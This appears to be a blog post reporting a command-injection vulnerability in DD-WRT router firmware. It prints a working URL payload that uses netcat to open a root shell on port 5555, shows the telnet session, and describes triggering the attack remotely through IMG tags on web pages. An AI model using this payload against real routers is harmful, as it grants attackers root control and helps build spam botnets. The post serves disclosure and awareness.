Amazing new exploit for Linksys routers running DD-WRT

Security researchers at millw0rm.com recently discovered a shockingly straightforward vulnerability in the DD-WRT open source firmware that is commonly installed on Linksys routers. The vulnerability enables one-liner ownership of DD-WRT boxes. For example, typing the following into your browser while within a hot spot served by a DD-WRT router will provide root shell access on port 5555:

http://<span style="font-style: italic;"><routerip></span>/cgi-bin/;nc$IFS-l$IFS-p$IFS5555$IFS-e$IFS/bin/sh

It looks a bit cryptic until you remove the $IFS’es, which are just there to insert spaces in the command:

http://routerIP/cgi-bin/;nc -l -p 5555 -e /bin/sh

With the spaces removed, you can see this is just a call to the venerable netcat (i.e. “nc”) command, which sets up a tiny server on port 5555 running the shell (/bin/sh). Once the shell service is thus initiated, you can log in using telnet and execute commands – note that the shell prompt is not displayed:

$ telnet routerIP 5555

uptime
8:32 up 4 days, 9:38, 5 users, load averages: 0.65 0.80 0.77

Worse, it’s possible to exploit this vulnerability by simply publishing IMG tags around the web that unsuspected people will visit using their browser while sitting in a hot spot serviced by a vulnerable DD-WRT wireless router. The IMG tag’s src URL just has to provide a netcat shell server as described above, and the router is instantly vulnerable to an attacker.

No doubt spammers and bot herders will be taking advantage of this vulnerability to create armies of wireless routers that they can press into service as spam zombies. The great thing about Linux-based routers as spamming machines is that they run at the edge of the firewall, enabling easier establishment of peer-to-peer command and control networks.

For more information, read the vulnerability disclosure.